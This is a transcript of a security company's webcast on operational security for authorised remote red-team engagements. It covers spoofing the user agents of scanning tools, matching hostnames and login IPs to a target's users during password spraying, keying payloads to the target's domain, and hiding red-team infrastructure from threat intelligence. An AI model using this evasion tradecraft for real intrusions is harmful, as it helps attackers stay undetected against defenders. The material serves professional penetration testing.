
OPSEC Fundamentals for Remote Red Teams

This webcast was originally published on March 23, 2021

In this video, Michael Allen discusses operational security fundamentals for remote red teams. He delves into the importance of maintaining secrecy in red team operations and the potential risks of exposure. Allen provides practical insights on how to effectively secure red team activities, highlighting the use of virtual machines, the control of source IP addresses, and the management of third-party services.

  • Preparation prior to the red team exercise is crucial for a smooth and effective operation, involving reconnaissance and setting up a clean virtual machine environment.
  • Maintaining operational security (OPSEC) during red team exercises is essential to avoid detection and ensure success, which includes managing source IP addresses and avoiding default configurations in tools.
  • Testing and vetting new tools before use in red team exercises is necessary to prevent unintended exposure and to ensure they perform as expected without harming the user or client.

Transcript

Transcript begins at 25:50 of the video.

Jason Blanchard

Hello, everybody. Welcome to a Black Hills Information Security webcast. We just had Chris Sanders with us from the Rural Tech Fund. We’re helping to support them in the work that they’re doing. We always look for a charity to support with our t-shirt sales.

And $2 of every shirt we sell goes to the Rural Tech Fund until the pre-order window is over next Thursday. So if anyone’s interested, we’ll drop the link in GoToWebinar for that.

Today, though, you’re here for a webcast from Michael Allen on OPSEC fundamentals for remote red teams. If you have a question at any time, feel free to ask it. But Michael’s got, like, 50 to 55 minutes of content today.

So what that means is we have a team of people on the back end that are going to try to answer your questions the best we can, either in Discord or in GoToWebinar. So feel free to ask in Discord, or in GoToWebinar if you’re not on Discord; we have a link there.

Just join us in the live chat. It’s got a big red button or big red circle, and that is where we are live right now. And with that, Michael, it’s all yours. I’ll see you in about 50 minutes, unless there’s any complications or problems, and then I’ll pop back on.

But other than that, it’s all yours.

Michael Allen

All right, cool. Sounds good. So, like Jason said, this is OPSEC fundamentals for remote red teams. And my name is Michael Allen.

I go by White Rhino online. Been pen testing and doing red teams professionally since 2014. I’m a security analyst now at BHIS; been there since 2019.

Got a few certifications in infosec, but I don’t have any formal training in OPSEC. All the stuff in this talk is just kind of from my own personal experience and stuff that’s been shared with me by others in the community.

I’ve made a lot of mistakes on the projects that I do, and so I’m just sharing some lessons that I’ve learned today. So, to kick this off, the title of the talk is OPSEC fundamentals for remote red teams.

But I know not everybody might be familiar with the term OPSEC. So if you’re not familiar with that term, OPSEC, it’s a military term. It means operations security.

And this is the definition from Wikipedia I’ve got here on this slide. And there are three main components of this definition that I wanted to point out. So, operations security:

Number one, it determines if friendly actions (that’s things we do) can be observed by enemy intelligence. Number two, it determines if information obtained by those adversaries could be interpreted in ways that would be useful to them.

And then number three, the friendly side, us, executes selected measures that eliminate or reduce the enemy’s ability to exploit that information that they’ve collected.

And so, you saw the image that was on the title slide, and you’ll see this image here on this slide. Both of these are posters from World War II; they were OPSEC posters from that time.

So they were reminders to anybody, maybe people not even in the military: maybe a military family member, or somebody that works in a factory that builds things for the military, something like that.

Even the smallest, seemingly trivial little details that they might share in passing conversation could give the enemy some kind of information that they could act on to carry out successful attacks against our side.

The other half of the title is remote red teams. In the context of this talk, that’s going to mean cyber attacks that we do across the Internet for our customers; the target organization in this case is our customer.

They’ve come to us. usually we’ll have, like, a trusted point of contact at any customer, and they are the only one that knows that the exercise is going on.

So it might be a C level executive, it might be someone who’s in charge of the security team, but someone who’s a decision maker who can orchestrate this kind of exercise without letting their security team know that this is going to go on.

Because the security team doesn’t know that this is happening. They are responding to the things that they observe us doing, just, like it’s a real attack, because for all intents and purposes, it may very well be.

Now, this is remote red teams specifically, so I’m not going to talk about physical security or wireless security, or the OPSEC that you would need to consider regarding those types of things if they were in scope.

Also, I’m really only going to talk about things that happen from the beginning of the project up to the initial breach. That’s because this content is kind of a spinoff of the content from our Red Team: Getting Access class that’s coming up.

And that class is primarily focused on the things that happen in the first half of the red team exercise, where you’re trying to get that initial foothold. So that’s what I’m going to talk about as far as these OPSEC concerns here today.

Why is OPSEC important for red teams? I said that these things that we’re doing are authorized by the target customer, but it sounds like what we’re doing is trying to hide some of the evidence of the things that we’re doing.

So why do we care about hiding evidence if what we’re doing is legal and we don’t have to worry about any legal repercussions? Well, one thing is the way that the infosec community and industry works: the adversary side, the offensive security side, and the defensive side share information with each other about how successful attacks happen and about how things are successfully defended.

So because of that, we really don’t have any secret weapons, nothing we could do that the blue team couldn’t potentially see coming ahead of time.

They have the potential, they have the resources, and the information is out there available. So, they could be expecting pretty much anything that we’re going to do. So, we want to have every advantage that we can possibly have, the element of surprise, that type of thing.

We don’t want to give away these actions before they actually happen. Also, modern blue teams have access to information that doesn’t just consist of the things that they can observe themselves.

Traditionally, blue teams have always had access to the logs on their Internet facing systems where, things are interacting with those systems coming in from the Internet. They’ve also had access to the logs on their internal systems that are making connections out to the Internet.

But in addition to those things, they can also get intelligence from third parties. These are services that are going out and, say, scanning things on the Internet and finding suspicious behavior whenever it can be detected ahead of time.

So servers that are being stood up that are running suspicious services, suspicious domain names that are being registered, anything like that.

These threat intelligence services, they can identify these things and provide that information to the blue team. And then the blue team can use other tools to analyze and correlate that information along with their own information that they’ve collected from their own systems and draw some conclusions that can be really detrimental to the things that we want to do as red teams.

Like I said, they could potentially stop things before they happen. So the analogy that I like to use to describe this kind of situation is a connect-the-dots picture.

So I’ve got a really simple connect the dots diagram here. And basically, the red team does not want the blue team to connect the dots. And every time that the red team does something that’s observable by the blue team, the red team is leaving another dot behind.

So, with enough of those dots, like you can see in the picture here, the blue team can complete the entire picture, and, they can see who the red team is, what, tools or infrastructure they’re using, and they may even be able to prevent those attacks before they occur.

That’s really, really frustrating if you’re on the side of the red team: before you realize that the blue team was able to figure out who you were or what you were going to do, they’ve already done it.

When you’re in that situation, you’re trying to do attacks or whatever, and those things just aren’t working, and you don’t know why. So we have to come up with some possible countermeasures that the red team can use to try and frustrate the blue team whenever they’re trying to connect these dots.

The first one is just don’t leave any dots behind. So you’ll see in the diagram, I’ve erased some of the dots that were there. That makes it a little bit more difficult to connect the dots and draw the picture of the rhinoceros, but it’s still possible.

And this would be kind of akin to a burglar who’s about to break into a house putting on gloves. What they want to do is not leave any fingerprints behind, so they put on those gloves to cover up their fingerprints.

So, kind of like that, we try to take actions that don’t leave any evidence of that action behind. Number two: whenever we can’t help but leave a dot, we try not to leave other clues that associate that dot with any other dots that we leave behind.

So to represent that in the diagram, I’ve taken away the numbers from the remaining dots. Again, this is a pretty simple diagram, so it’s still pretty easy to see that it draws a rhinoceros. But in a more complex scenario, maybe there aren’t lines there to help out.

It might be a little bit less obvious what all of those dots are indicating. And then number three: create dots that associate dots with other unrelated dots.

So that basically just means leaving disinformation, doing things that are going to frustrate efforts to draw relationships between the evidence that’s left behind, because it leads you off down a different path.

Just like if you were to follow the numbers in this diagram, they would not draw a rhinoceros anymore. Now, in this webcast, I’m only really going to be talking about number two.

The reason for that is that number one has more to do with the things that we do, say, during passive recon, whenever we’re interacting with third parties to try and gain information about our target, or when we’re doing other things that they would have no ability to see us doing at all.

And number three, the disinformation part, we don’t really ever do that on any of the red team exercises that I’m involved in. One reason is because our timeframe is, like, for the whole red team exercise, we have a set timeframe.

It’s already pretty short. Then for the portion that I’m talking about in this webcast, we’re talking about half of that. So we really just don’t have time to go out there and do a whole bunch of extra stuff to confuse things any further.

We’re usually trying to move the attack forward throughout the entire thing that we’re doing, the portion of the red team that we’re responsible for. So I won’t be talking about either of those in this webcast.

They certainly could be used in those contexts. There are also other threats to the red team beyond just the blue team that we should also, be wary of.

One is data leaks, and these could be data leaks that are observed by anyone. So I’m sure you’ve all heard of, like, Amazon S3 buckets being exposed to the Internet insecurely, and there being all kinds of data in there about customers or something like that.

Well, if the red team were to leak information about themselves or their customers, that would be really damaging to the company’s reputation. It could be damaging to the customers, and could violate non-disclosure agreements or things like that, because customers don’t usually want you to tell everyone who they had doing their security testing.

So that would be one very damaging thing that could happen based on the information that we’re leaking out there on the Internet. The other bad thing that could happen is that we could be attacked by real-world threat actors.

So, there’s always these threat actors out there on the Internet who are scanning network services and looking for ways to attack stuff that’s out there.

And when we’re operating on a red team, we’re setting up servers, we’re running network services, we’re doing all the things that you normally do in any type of technical job that involves computers and the Internet.

And we always also have to be wary that there are real-world attackers out there while we’re trying to be the attacker doing our red team exercise. So I’ve broken the process for assessing red team actions down into these four steps here.

So first of all, we want to plan any likely actions that we’re going to take on any given red team exercise. We’re always going to do recon. It’s very common that we’re going to do password guessing, and very common that we’re going to do some phishing, stuff like that. Those things we know ahead of time that we’re probably going to do, so we want to go ahead and plan them out.

And then after we plan that, go ahead and brainstorm some of the things that we think might be disclosed by those actions that we’re going to take. Some of these might be obvious, and some of them might not be, but really think deeply about what kind of information could be disclosed or observed when we take those actions. Then assess whether the information that we disclose could be used against us in some way.

So thinking about, what is that information that we’re disclosing? Because the nature of the information itself is going to determine whether it could be used against us or not.

Maybe also who can see it. So if we’re sharing it with a third party, but we expect that we have a reasonable level of privacy with that third party, maybe it’s not quite as much of an issue.

And is it likely for that information to be used against the red team? Then, number four: adjust our plans to mitigate those risks, so that we can take care of that ahead of time, before it becomes an issue.

And when I’m doing this on my own, looking at this from the perspective of my own procedures and stuff that I do on red teams, I try and build this into my procedures so that in the future I can repeat the same process.

And I’m constantly getting better at this. So the process I use to do that is to just document those steps that I’ve taken, and then go back through that documentation whenever I’m doing those phases of the red team exercise in the future. This would apply to any phase, like setup, reconnaissance, attacks, those kinds of things that I mentioned that you do on pretty much every single red team exercise.

You also want to apply this process before you use any new tools or techniques, by setting up a test environment and seeing what those new tools or techniques look like from your target’s point of view.

So you can see whether they’re seeing anything that looks suspicious. I’ll also get into that in a little bit more detail as we go through this. So, my standard operating procedures for red team OPSEC: I’ve got them broken down into five sections here.

There was a little bit more to begin with, but I had to cut down on some of the content to make this fit into an hour long webcast. So this is just kind of the highlights. First, we’ll start with local workstation setup.

On my local workstation that I operate from whenever I’m doing a red team exercise or a penetration test or anything like that, I use virtual machines. And these are really convenient for many reasons.

Outside of OPSEC, I can get all my tools configured just the way I want them to be. I have everything installed on there. It really saves a lot of time as far as setup for each project.

But from that OPSEC perspective, I can go ahead and configure everything so that it’s not leaking any information about the stuff that I’m doing.

So, using my best practices that I’ve identified previously, I’ve also got a clean environment, so there are no artifacts left over from other customers, nothing left over from any research I’ve done, anything like that.

Everything’s fresh for every single project, and then it’s really easy to deploy additional VMs if I find that I need another virtual machine to work from on that same project.

Also, the VM images can be updated and modified without having to rebuild them from scratch by using the snapshot feature. So I make use of that all the time. That way I only really have to rebuild my VM maybe once or twice a year.

That’s maybe more frequently than I really need to, but I just like to do that so that I have everything exactly the way I want it. I also keep a checklist of the way that I’ve configured everything on the VM.

So that way, as I’m building it the next time, I can just go through that checklist, and I add to it every time. Also, using a virtual machine gives you a little bit of extra protection against accidental compromise.

Something to think about is whether you’re using a tool that’s been vetted or accepted by a lot of the security community, or whether you’re using a tool that you just found today.

These are all hacking tools that we’re downloading from the Internet that were made by other hackers. It doesn’t matter if it’s Kali Linux and one of the tools that’s included with it, or something else.

There’s always that possibility that there could be something in there that you didn’t know was there, that’s going to do something that you didn’t want it to do. The basic layout and organization of the virtual machines that I use is described here in these bullet points.

So on the right there you’ll see a picture of VirtualBox. That’s what I prefer to use for running these virtual machines. But there are several different virtualization solutions you can use; I just like that one because it’s free.

Kali Linux is pretty straightforward. It’s got a bunch of tools already installed on that VM, and I just add a few more to it and configure the interface the way I like. And that one’s pretty good to go.

Next, the Windows attack VM. That one I have set up specifically to run any attack tools that are Windows-specific and to test any executable payloads. Before I test them against antivirus or anything like that, I test them just to make sure they actually execute and do what they’re supposed to do.

I make some configuration changes to that VM. I disable all the defenses on it, so it doesn’t have any firewall or antivirus that would get in the way of getting those executable payloads to work.

I also make some changes to my browser configurations and stuff like that. So that one’s pretty heavily modified. Now, in contrast to that, the Windows test VM is stock.

It is the latest build of Windows. I don’t install any extra libraries, no development tools, nothing like that. That way I can test on that machine if my payloads are going to be portable to other Windows systems, if they’re going to run successfully without requiring any dependencies or anything that’s not there.

I also leave all the defenses intact, so that, for example, with Windows Defender, which is on most Windows systems, I can test my payloads against Windows Defender. If I find out that my target has any additional antivirus or endpoint protection software installed in their environment, I’m going to install that on there so I can test against it as well.

I also use this VM for authenticated connections to the network, since it is the most stock, and configured the most similarly to their actual workstations, of the VMs that I use.

So, some specific modifications that I make to the operating systems. First of all, setting a strong password. Of course, like I said, there are real threat actors out there, so we need to follow best practices to keep our systems safe.

But I also change the hostname and local username. You’ll notice I’ve got remote and on site noted here under the hostname and local username. What I’m trying to do is make my system look as benign as possible.

Now if I was on site when I’m setting this host name, I’d probably set it to something like printer or deskjet so that maybe it looks a little bit like a printer that someone’s plugged in at their desk.

Maybe they went to Home Depot or Office Depot and they bought a printer and plugged it in at their desk. It’s just going to show up on the network as maybe printer or deskjet or something like that. But if you see printer or deskjet talking to your network from the other side of the Internet, then that’s going to look pretty suspicious.

So there’s a difference in context there. So for remote testing I’m going to use a name like localhost or desktop or PC, something really generic and that’s what I set it to out of the gate.

But after I’ve done some recon and I’ve figured out maybe the internal host naming scheme or maybe some real internal host names and internal usernames as well, I’m going to change those settings to make that match what I’m seeing in the target environment.
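As a rough sketch of what that renaming might look like on a Linux testing VM (hostnamectl assumes a systemd distro such as Kali and needs root, so those commands are shown commented out; DESKTOP-J4K2 is a made-up example of a recon-derived name):

```shell
# Generic name out of the gate; swap in a recon-derived name later.
GENERIC_NAME="desktop"
RECON_NAME="DESKTOP-J4K2"   # hypothetical name matching the target's scheme

# On a systemd distro (e.g., Kali), as root:
#   hostnamectl set-hostname "$GENERIC_NAME"
# Later, after recon reveals the target's naming convention:
#   hostnamectl set-hostname "$RECON_NAME"
echo "start as $GENERIC_NAME, later become $RECON_NAME"
```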

You might be asking, well, it’s my local host name. How is this going to get exposed during a red team exercise or something like that? Well, when you’re interacting with services that are operated by your target, there’s plenty of opportunity for them to either intentionally or unintentionally set things up that are going to collect some of that information from your computer.

So you might be interacting with a service that uses NTLM authentication, and during those authentication requests, which you might not even see happen, it could potentially elicit your username or hostname.

Honeypot documents are another opportunity. If you download those documents from the target’s website and they’re made to call home, they can get your username or your hostname and send that information back.

I’m always looking out for that kind of thing. Really, the biggest thing in my mind whenever I think about this is the stuff that I don’t know about that could be used against me. There’s not really any good reason I can come up with why my hostname needs to be hacker computer, or my username needs to be like Zero Cool or something, or White Rhino in my case, whenever I’m doing a red team, because that information can get leaked.

And that would be really embarrassing to have that information used against you by the blue team because of some kind of leak like that. You also might ask, why change the domain name?

This brings up another way that this information can get leaked. I mentioned that my test VM is what I use for connections to the target environment.

So it’s really trivial for VPN servers and the client software to enumerate different configuration settings on your computer and report that back to the VPN server.

They can report back things like the domain name that your computer is connected to, the host name, your username, and whether it’s a domain user or not, your operating system version and patch level, whether expected antivirus products are installed, all kinds of stuff like that, because your VPN client is usually running with elevated privileges on the system that you’re running it on.

So it would be very easy for a blue team to alert on an incoming authenticated connection to their network that is from a computer that is not joined to their domain. So you want a machine that at the very least has the same name as their domain, if not an actual computer that’s joined to their domain.

So because that’s so easy for them to do, and because products actually support that, that’s something that I watch out for. So I try and make my test VM configured as closely as possible to the way that their actual workstations are configured.

It’s also really useful whenever you’re keying payloads to execute in their environment, because that way you can test it: if I run this on a computer that actually is connected to a domain with the same name as the environment it’s intended to run in, is it going to execute? And is it not going to execute if I run it on my other Windows VM that doesn’t have the same domain name? After I’ve configured my operating system, I then go in and configure all the individual tools.
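Before moving on to tool configuration: the domain-keying check just described can be sketched as a simple guard. This is a generic shell illustration only, not the actual payload logic; a real payload on a Windows target would query the machine’s actual domain membership, and corp.example is a placeholder:

```shell
# Hypothetical domain-keyed guard: only proceed when this host's DNS domain
# matches the intended target's domain. "corp.example" is a placeholder.
TARGET_DOMAIN="corp.example"
CURRENT_DOMAIN="$(dnsdomainname 2>/dev/null || echo unknown)"

if [ "$CURRENT_DOMAIN" = "$TARGET_DOMAIN" ]; then
    echo "domain matches: payload would continue"
else
    echo "domain mismatch: exiting quietly"
fi
```

Run on the matching-domain test VM, the payload should fire; run anywhere else, it should exit without doing anything.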

One setting that is seen in a lot of tools is the user agent header. This would be in pretty much any tool that is going to interact with a web server and make web requests.

The things that it sends to the web server are your browser software and the version number of that browser software, or whatever that client is if it’s not a browser, and also the operating system and sometimes the operating system version number.

So for some examples of that, I’ve got two screenshots here: the Kali Linux default web browser user agent up at the top, and the Windows Edge web browser down at the bottom.

All I’ve done to get this information is just go to DuckDuckGo, type in user agent, and at the top of the search results it tells me my user agent. You can see in the Kali Linux user agent string that it actually says Linux x86_64.

So it’s reporting that this is a Linux system, and also Firefox 78.0, so it’s reporting Firefox and the version that we’re running. Now, in and of itself, that might not be really suspicious, because lots of people run Linux, maybe.

And that user agent might be used by a lot of machines on the Internet but that user agent is definitely used by every Kali Linux system on the Internet.

So that immediately makes it kind of suspicious to me. Some other more suspicious user agents are the ones that are sent by Nmap and WPScan.

And these are just a couple of examples; there are examples of this kind of thing in many hacking tools, and this is something that you always need to go in and change. So the top screenshots up here show the Nmap command that I ran and then the user agent that was observed, and you can see it’s telling you right there in the user agent: Nmap Scripting Engine, and then it’s got the URL to the Nmap documentation.

Same thing for WPScan, which is a scanner used for scanning WordPress websites: it’s got the name of the tool, the version number, and a URL for accessing the WPScan documentation.

So those things right there are going to be big red flags to the blue team if they see a whole bunch of requests coming in from Nmap or WPScan or any other known hacking tools.

What you want to do is you want to change those. And what you would want to change them to is something that they’re going to see on a regular basis that is not going to give them any suspicion at all.

In particular, you probably want to change them to something whose traffic is going to be similar to the things that you’re doing. So for example, with Nmap or WPScan, where these scanners are potentially making a lot of web requests to the web service, you might want to use the Googlebot user agent. That’s the user agent that’s sent whenever Google’s search engine goes out and indexes a website.

So it’s the kind of thing that’s going to be making a lot of web requests. In contrast, if you’re using a web browser and maybe you don’t want to be sending that default user agent of the Kali Linux browser, then you could use the Google Chrome on Windows 10 user agent.

So I completely throw them off: I tell them it’s Google Chrome, on a different operating system. And that’s a very common user agent. You can actually go out and search online and find out what the most common user agent is at any given time.
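For the scanner side specifically, here is a sketch of passing a Googlebot-style agent to those two tools. The flags shown (Nmap’s http.useragent script argument and WPScan’s --user-agent option) are real, the target hostname is a placeholder, and the Googlebot string should be checked against Google’s current published one:

```shell
# Googlebot-style user agent for scanner traffic (verify the current string
# against Google's crawler documentation before relying on it).
UA='Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'

# Nmap's HTTP NSE scripts honor the http.useragent script argument:
#   nmap -p 80,443 --script http-title --script-args http.useragent="$UA" target.example.com
# WPScan takes a --user-agent flag:
#   wpscan --url https://target.example.com --user-agent "$UA"
echo "$UA"
```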

My slides got stuck. Okay, so some examples for how you would actually change that user agent. I’ve got some command line examples here.

With pretty much anything that I do, I want to try and make it fail-safe, so that if it fails, it’s safe for me. So what I’ll typically do is create some aliases in my RC file in my Linux environment, the bash or zsh RC file.

And those aliases, what they do is like if I run curl or wget and I forget to use the flag to change the user agent, then they’re going to go ahead and set that user agent for me.

So that way if I forget it doesn’t forget, it takes care of it. I also set that user agent in an environment variable. You can see here up at the top of this box, I’ve got it set in the agent variable.

What that does is let me reuse it really easily, without having to go and copy and paste it from somewhere, right into other commands. If there’s a command, like down at the bottom where I’ve got WPScan, and I want to throw the user agent into that command, I don’t want to have to go dig it up, and I don’t want my copying and pasting to be prone to user error.

Then I can just throw $AGENT in there and it’s going to fill in the blank for me. Changing the user agent for your web browser is just as simple. You can use extensions, like for Firefox, for example.

I linked to the User-Agent Switcher and Manager extension. But I like to do it manually myself. The reason I really like to do it manually is that I try and keep as small a number of tools installed on my testing systems as I can, because each tool is another tool that I need to vet and need to trust.

So if it’s an extension that’s made by somebody who I don’t know and I haven’t vetted that extension, I’d prefer to do it manually. So if you follow the numbers and the screenshots there, it’ll walk you through changing your user agent.

In Firefox it’s really simple. You just open up about:config and change one setting in there. There are other ways that browsers can leak information about the things you’re doing as well.

This screenshot is from the Google Chrome browser. So I’ll read you this text, because it’s kind of small. It says: sends URLs of some pages you visit and some page content to Google to help discover new threats and protect everyone on the web.

That’s pretty much the opposite of what I want as an attacker. I definitely don’t want URLs or page content of my phishing landing pages or anything like that getting sent back to Google.

And I definitely don’t want everybody using the Google Chrome browser to start getting alerts that pop up and say this website’s malicious. That would be pretty terrible. So make sure you turn all that stuff off.
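To put the user agent pieces above in one place, here is a sketch of the fail-safe shell setup plus a scriptable version of the Firefox change. Firefox reads the general.useragent.override preference, which can also be set from a profile’s user.js file; the UA string and the demo profile path are examples, not the real values:

```shell
# Reusable user agent in an environment variable (example Chrome-on-Windows
# string; substitute whatever common string you've chosen).
AGENT='Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.82 Safari/537.36'
export AGENT

# Fail-safe aliases: if I forget the user agent flag, the alias supplies it.
alias curl='curl -A "$AGENT"'
alias wget='wget --user-agent="$AGENT"'

# Firefox: the about:config setting is general.useragent.override, and it can
# be baked into a profile's user.js. "./demo-profile" stands in for the real
# profile directory under ~/.mozilla/firefox/.
PROFILE="./demo-profile"
mkdir -p "$PROFILE"
printf 'user_pref("general.useragent.override", "%s");\n' "$AGENT" >> "$PROFILE/user.js"
```

The aliases would normally live in the bash or zsh RC file so they load in every session, and the user.js line can be part of the VM build checklist.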

You might make your browser decisions that you’re going to use on your systems based on some of this information about what they leak. And you may use different browsers at different stages in your process as well.

So early on, whenever maybe everything’s not set up OPSEC-safe yet, and you’re not filtering any user agents or things like that coming in from external connections to your phishing server, then maybe don’t use browsers that are going to leak that kind of information during that phase of the exercise.

After I've assessed my own local system, I'm going to take a look at the source IP addresses that I'm using whenever I do different steps of the attack or the recon.

And I’ve noted three different criteria here that might make an IP address suspicious. So we’ve got association with other suspicious traffic, the physical location associated with the IP address and the service provider and type of connection.

Those two I kind of lumped together in number three because I think they're related. And I've got a list of some of the different types a connection might be categorized as.

The screenshots are two different screenshots taken from looking up two different IP addresses on whatismyipaddress.com, showing the information that was immediately available when I looked up those addresses.

So you can see, on the right-hand side screenshot, we've got the ISP and the organization (those are the same for that one), the services that have been observed from this IP address, the type (is it corporate or residential? is it a static IP address?), and what location the IP address is coming from.

All of those things are immediately available just by typing in the IP address.

And the blue team also has access to that information so they can very quickly categorize the IP addresses that you’re operating from and they may block some or do other actions based on that categorization.

The screenshot on the left was from doing the same test while connected to the Tor network. And you'll see that under services there we've got: confirmed proxy server, Tor exit node, and recently reported forum spam source.

So this is going to be an extremely suspicious IP address to be operating from. So those are things to take into account. You want to make sure you vet your IP addresses that you’re coming from before you do anything with them.
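As a sketch of that vetting step: 203.0.113.7 is a reserved documentation address, and the whois output below is canned so the triage runs offline — the live lookups are the commented lines at the top.

```shell
# Live lookups (network required):
#   whois 203.0.113.7
#   dig +short -x 203.0.113.7
# Canned whois excerpt standing in for a real response:
cat > whois_sample.txt <<'EOF'
NetName:    EXAMPLE-VPS-NET
OrgName:    Example Cloud Hosting
Country:    RO
EOF
# Flag anything that smells like hosting/VPS rather than a home or
# corporate ISP -- the same categorization the blue team will see:
grep -iE 'vps|cloud|hosting|proxy|tor' whois_sample.txt
```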

Some countermeasures that you can use when vetting those source IP addresses, or when you're trying to disguise some of your actions or prevent the blue team from catching on:

One: never use the same IP address for any two activities that you don't want associated with each other. Just like in the previous slide, one of those IP addresses was already associated with forum spam.

You might be doing some port scanning or something like that. You don't want to do, say, phishing, or host your malicious payload, on the same IP address that you just used for port scanning. You want to use a totally different IP address for that.

Also, IP addresses should make sense relative to your actions from that IP. Consider this in the context of logging into user accounts as you get usernames and passwords and want to test them.

First off, use just one IP address for each user account, and keep using that same IP address for all logins to that account. When you're working from home, you're logging in from the same IP address every day, and probably nobody else that you work with is logging in from your IP address.

That’s how it happens in the real world. So you want to mimic that behavior as much as possible. Also log in from an IP address that’s in the same region as the user that you’re targeting.

And you'll see this screenshot on the right-hand side — that was from Gmail. To get that screenshot, all I did was log into my Gmail account from an IP address in a location that I didn't normally log in from.

They automatically sent me a message saying, hey, we noticed a new device — that's how they worded it in this case. But the IP address was the suspicious thing: it was still the same user agent, same web browser, everything was the same, except I hadn't logged in from that IP address before.

So this is really common for Gmail, for office 365, for a lot of services on the Internet, they’ll send you these kind of messages.

And since those services can do that so easily, we can also infer that the blue team can probably do that just as easily. And if they’re using any of those services, like many organizations are using Office 365 internally, then those features are already built right in.

So that's something we definitely have to watch out for, because if we don't, that user is going to get that message and they're going to change their password, because they'll say, hey, I didn't just log in from some IP address in Transylvania.

And after they've changed their password, we're not going to have access to that account anymore — and that might have been the only account we had. Also, log in from a service provider that makes sense for the target user.

So probably not a VPS. Most companies probably don't have their employees logging in from some random computer in Amazon AWS or Azure or something like that.

And like I said before, avoid those known suspicious IPs. Tor exit nodes: already suspicious. Public proxy servers: already suspicious. So watch out for those kinds of things whenever you're logging into user accounts.

Also, when you are using a VPN, make sure your VPN connection fails safe — I mentioned that fail-safe term before. Say I'm in the middle of a password spraying attack that's running from my system while I'm connected to a VPN, and then in the middle of that attack, my VPN connection goes down.

Everything else is still working, but the VPN connection goes down. What's going to happen in many cases is that the password spraying is going to continue, but now the source is going to be the IP address at my house — and I don't want that, especially if you're testing, say, a big content delivery network, and they blacklist your IP address, and now you can't access a lot of the content on the Internet.

This first box here is the command that I use whenever I'm connecting to an OpenVPN server; it runs the script that's listed in the second box.

And what that does is, if my VPN connection goes down, then OpenVPN will run that script for me, and that script will just bring all of my network interfaces down, so that my VM is no longer connected to the network whatsoever.

So maybe it keeps trying to spray those passwords, but they're not going anywhere, and I'm definitely not generating that malicious traffic — and that's what I want.
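The slides themselves aren't reproduced here, so as a sketch of what such a fail-safe setup can look like (the filenames and the script body are illustrative, not the exact slide content):

```shell
# Write a "down" script for OpenVPN to run if the tunnel drops.
# It downs every non-loopback interface so nothing leaks from the real IP.
cat > failsafe.sh <<'EOF'
#!/bin/sh
for path in /sys/class/net/*; do
    iface=${path##*/}
    [ "$iface" = "lo" ] && continue
    ip link set "$iface" down
done
EOF
chmod +x failsafe.sh

# Connect with script hooks allowed (--script-security 2) and the script
# registered to fire when the VPN connection goes down:
#   openvpn --config client.ovpn --script-security 2 --down ./failsafe.sh
```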

Other third-party services — meaning in addition to the source IP addresses that we just covered. Whenever you're looking at new third-party services that you're going to use during a red team exercise, assess whether the registration information you provide them is likely to be exposed to the public.

Some third party services do expose that information publicly. Also assess whether the use of the same account across multiple projects might leak information about you or your customers.

Could someone on the Internet identify that all these accounts are owned by the same company, and that they're named in such a way that you can tell their customers are Customer A, B, and C — maybe something like that?

Or could they tell that you’re the one that owns that account? Maybe it makes more sense to set up brand new third party service accounts for each red team exercise that you do in order to have that extra layer of security.

Also identify any additional areas of concern. This is going to be different for every service that you use. Some services may have extra features or other things.

Just the nature of the service may bring up other opportunities for information to leak out. One of the third party services that is really commonly used by us on red team exercises is domain name registrars.

We’ll go out and we’ll register new domain names either in preparation for red team exercise down the road, or maybe during an ongoing red team exercise. One thing you want to make sure you do is always turn on private registration.

It's also called WHOIS privacy — make sure that's enabled by default on your account. You want to make sure that when you register the domain, there is not a gap between when the domain was actually registered and when that WHOIS privacy was enabled on the domain.

And the reason for that is there are third parties out there who are logging that registration information, and they have databases that can be queried to find historical WHOIS information.

And your information will show up in there if the privacy was not enabled right out of the gate. Also, just like with IP addresses, you want to segregate the domains by whatever purpose you’re using them for.

So you don't want to send email, serve your payload files, and receive C2 callbacks all from one domain. Instead, do each of those things from a different domain. Every action that you take should ideally come from a different domain name.

Or if you’re going to do multiple actions from the same domain name, maybe it’s actions that you don’t care as much about them being associated with each other. Some other concerns about domain names.

Typo squatting has been a pretty common red team tactic for a few years, but these days it’s not really safe to do. There are services out there that will detect typo squatting and when you register a domain that is mimicking one of their customers, they will send an email to that customer telling them, this domain was just registered and it’s pointing at such and such IP address and then the blue team can act on that.

These services also detect subdomains. So I went out to the dnstwister website and typed in blackhillsinfosec.com, and immediately got back three cases of typo squatting in the results.

Now if you look closely at those, you'll see that the first one is just a typo-squatted domain — blackhilsinfosec.com, missing an l in the word hills. But the second and third, the ones that I've got circled, are actually subdomain and parent domain names that combine to spell blackhillsinfosec.

For example, blackhillsin.fosec.com. So just because you get tricky with your subdomain naming doesn't mean that it's not going to get detected.

This took no time to come up — it was instant. And these services will alert the blue team to that kind of thing immediately. Also: SSL and TLS certificates.

When you generate these certificates from certificate authorities, that information can also be exposed — for example, in certificate transparency logs. And generating those certificates is something that we also do very commonly during red team exercises.

So say for example, if you have a domain, maybe it’s a generic sounding domain name, but use customer names for the subdomains of that domain and that’s what you use during your exercises.

Well, if you reuse that across multiple customers, then that information could be leaked. If you generated an SSL certificate for each of those subdomains, someone could just go out and query the certificate transparency logs for that domain and find all of those subdomains and that could expose the names of all of your customers.
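That lookup is easy to reproduce. crt.sh is one public search engine over the CT logs, and it answers queries like the commented curl below; the sample JSON stands in for its output so the extraction step runs offline (the subdomain names are invented):

```shell
# Real query (network required):
#   curl -s 'https://crt.sh/?q=%25.example.com&output=json'
# Canned stand-in for the response:
cat > ct_sample.json <<'EOF'
[{"name_value":"customer-a.example.com"},{"name_value":"customer-b.example.com"}]
EOF
# Pull every certificate subject name out of the results:
grep -o '"name_value":"[^"]*"' ct_sample.json | cut -d'"' -f4
# prints customer-a.example.com and customer-b.example.com
```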

Also you could expose your work email address in the certificate itself if you use it to register for that certificate. So that would be a dead giveaway.

If the blue team is investigating some server out on the Internet that they're suspicious about, and they look through the SSL certificate and see mallen@blackhillsinfosec.com in it, then that's going to be a dead giveaway that this is part of a red team exercise.

So you don't want that. I always use the --register-unsafely-without-email flag whenever I'm requesting a certificate from Let's Encrypt, for that reason. So I've included that command there.
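The slide itself isn't shown here, but a certbot invocation using that flag looks roughly like this — the domain is a placeholder, and this is a sketch rather than the exact slide command:

```shell
certbot certonly --standalone --agree-tos \
  --register-unsafely-without-email \
  -d phish-domain.example.com
```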

